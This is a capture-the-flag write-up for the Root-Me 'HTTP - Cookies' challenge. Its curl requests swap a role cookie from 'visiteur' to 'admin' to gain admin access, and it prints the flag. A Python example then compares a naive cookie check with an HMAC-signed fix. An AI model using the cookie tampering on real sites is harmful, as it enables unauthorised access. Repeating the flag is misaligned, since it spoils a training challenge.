HTTP - Cookies
- Points: 20
- Link: https://www.root-me.org/en/Challenges/Web-Server/HTTP-Cookies
Statement
Bob created a PHP script to gather user emails
PS: Bob really love cookies!
Solution
curl -i http://challenge01.root-me.org/web-serveur/ch7/
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 12 Jul 2023 03:09:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
<br/>
<br/>
<fieldset>
<form method="POST" action="" name="a">
Email<br/>
<input type="text" name="mail" size="20" class="post2" value=""><br/><br/>
<input type="submit" name="jsep4b" size="20" class="post2" value="send"><br/><br/>
</form><!--SetCookie("ch7","visiteur");--><a href="?c=visiteur">Saved email adresses</a><br/></fieldset>
Check all the links, as usual
curl -i "http://challenge01.root-me.org/web-serveur/ch7/?c=visiteur"
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 12 Jul 2023 03:13:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: ch7=visiteur
<br/>
<br/>
<fieldset>
<form method="POST" action="" name="a">
Email<br/>
<input type="text" name="mail" size="20" class="post2" value=""><br/><br/>
<input type="submit" name="jsep4b" size="20" class="post2" value="send"><br/><br/>
</form><!--SetCookie("ch7","visiteur");--><a href="?c=visiteur">Saved email adresses</a><br/>You need to be admin</fieldset>
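“You need to be admin”… The response sets the cookie ch7=visiteur, so resend the request with the cookie value changed to admin.
curl -i -H "Cookie: ch7=admin" "http://challenge01.root-me.org/web-serveur/ch7/?c=visiteur"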
<div>Validation password : ml-SYMPA
</div></fieldset>
The flag is
ml-SYMPA
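The challenge works because the server takes the role from a cookie the client fully controls. The added example below (not the challenge's PHP source, which the page does not show) models that check in Python next to a hardened variant that only accepts a role carrying a server-side HMAC tag. The function names and SECRET_KEY are hypothetical; only the cookie name ch7 and the values visiteur and admin come from the page.

```python
import hashlib
import hmac
import secrets

# Hypothetical server-side secret (assumption); it is never sent to the client.
SECRET_KEY = secrets.token_bytes(32)

def parse_cookie_header(header: str) -> dict:
    """Parse a Cookie request header ("a=1; b=2") into a dict."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies

def is_admin_naive(cookie_header: str) -> bool:
    """Behaviour seen in the write-up: the role is whatever the client sends."""
    return parse_cookie_header(cookie_header).get("ch7") == "admin"

def issue_role_cookie(role: str) -> str:
    """Server-issued value: the role plus an HMAC-SHA256 tag over the role."""
    tag = hmac.new(SECRET_KEY, role.encode(), hashlib.sha256).hexdigest()
    return f"{role}.{tag}"

def is_admin_signed(cookie_header: str) -> bool:
    """Accept the role only if its tag verifies under the server key."""
    value = parse_cookie_header(cookie_header).get("ch7", "")
    role, sep, tag = value.rpartition(".")
    if not sep:
        return False  # an unsigned value such as "admin" is rejected
    expected = hmac.new(SECRET_KEY, role.encode(), hashlib.sha256).hexdigest()
    ok = hmac.compare_digest(tag.encode(), expected.encode())  # constant-time
    return ok and role == "admin"

if __name__ == "__main__":
    # Constructed sample headers: plain value, swapped role with a visitor's tag, genuine.
    visitor = issue_role_cookie("visiteur")
    forged = "admin." + visitor.rpartition(".")[2]
    for header in ("ch7=admin", f"ch7={forged}", f"ch7={issue_role_cookie('admin')}"):
        print(header[:24], is_admin_naive(header), is_admin_signed(header))
```

A signed value only protects integrity; it does not expire or get revoked, so a server-side session that stores the role and hands the client an opaque random identifier is the more common design.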
This post is licensed under CC BY 4.0 by the author.